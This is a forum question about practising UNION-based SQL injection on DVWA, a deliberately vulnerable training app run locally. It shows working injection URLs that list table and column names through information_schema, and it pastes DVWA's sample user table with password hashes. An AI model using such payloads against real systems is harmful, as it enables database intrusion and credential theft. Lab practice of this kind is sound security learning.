DVWA SQLi: How to get column names from table “users” only? [closed]

This is DVWA database. There are only 2 tables in it.

mysql> show tables;  +----------------+ | Tables_in_dvwa | +----------------+ | guestbook      |  | users          |  +----------------+ 2 rows in set (0.00 sec)  mysql>  

I’ve no issue getting these 2 tables via SQL injection bug

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=' UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web (TABLE_NAME in “dvwa” DATABASE)

First name: guestbook,users 

Table “users” looks interesting and would like to know all columns in it.

There are 6 columns as shown in MySQL query below.

mysql> SELECT * FROM users; +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ | user_id | first_name | last_name | user    | password                         | avatar                                                | +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ |       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/admin.jpg   |  |       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg |  |       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://172.16.123.129/dvwa/hackable/users/1337.jpg    |  |       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   |  |       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  |  +---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+ 5 rows in set (0.00 sec)  mysql>  

However, my next attempt to get only columns from table users didn’t work well.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=' UNION SELECT GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_schema=DATABASE() -- -&Submit=Submit# 

Output in web

First name: comment_id,comment,name,user_id,first_name,last_name,user,password,avatar 

The problem is columns comment_id,comment,name are not part of users table.

What’s wrong in this SQLi syntax and how do I get only column names from table users only.

DESIRED OUTPUT

First name: user_id,first_name,last_name,user,password,avatar